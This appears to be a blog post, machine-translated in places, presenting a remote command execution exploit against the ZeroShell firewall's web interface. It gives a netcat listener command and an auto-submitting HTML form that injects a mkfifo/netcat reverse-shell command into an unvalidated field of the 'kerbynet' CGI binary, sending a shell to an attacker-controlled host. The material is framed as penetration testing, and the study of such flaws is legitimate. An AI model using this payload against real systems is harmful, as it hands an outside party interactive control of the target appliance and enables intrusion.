Remote Command Execution - Reverse-shell
For this step, it is necessary that a token of Directors session (generated using the previous method or not) is in your possession. All HTML forms the WebGUI ultimately send their data to the SH scripts (via binary "kerbynet"). These data are unfortunately not sufficiently validated and cleaned. It is possible to alter the lawful execution of scripts with arbitrary commands.
In this example, arbitrary command on the distribution is to launch a netcat via a FIFO for a reverse-shell side pentester.
The pentester begins by putting his own netcat listening:
1
| nc -l -vv -p [PENTESTER_PORT] |
Then simply run the following in the browser, after editing HTML script:
- [PENTESTER_IP] the ip pentester to ZeroShell which will transmit its shell
- [PENTESTER_PORT] netcat listening port on the machine pentester
- [ZEROSHELL_IP]: the IP / hostname of the target ZeroShell
- [GENERATED_SESSION_ID]: The session token captured or generated
1
2
3
4
5
6
7
8
9
| </pre><form action="http://[ZEROSHELL_IP]/cgi-bin/kerbynet" method="post" name="x"><input type="hidden" name="Action" value="Lookup" /> <input type="hidden" name="STk" value="[GENERATED_SESSION_ID]" /> <input type="hidden" name="Section" value="DNS" /> <input type="hidden" name="What" value="yanncam" localhost && rm -f /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc [PENTESTER_IP] [PENTESTER_PORT] > /tmp/x #" /> <input type="hidden" name="DNS" value="localhost" /></form><pre><script type="text/javascript">// <![CDATA[document.forms['x'].submit();// ]]></script> |
Reverse-shell on ZeroShell
ZeroShell has natively netcat. However this version of nc does not exploit the flag-e or-c, where the use of a chaining via mkfifo. For more information and when to use variants of reverse-shell commands, refer to the dedicated section .
No comments:
Post a Comment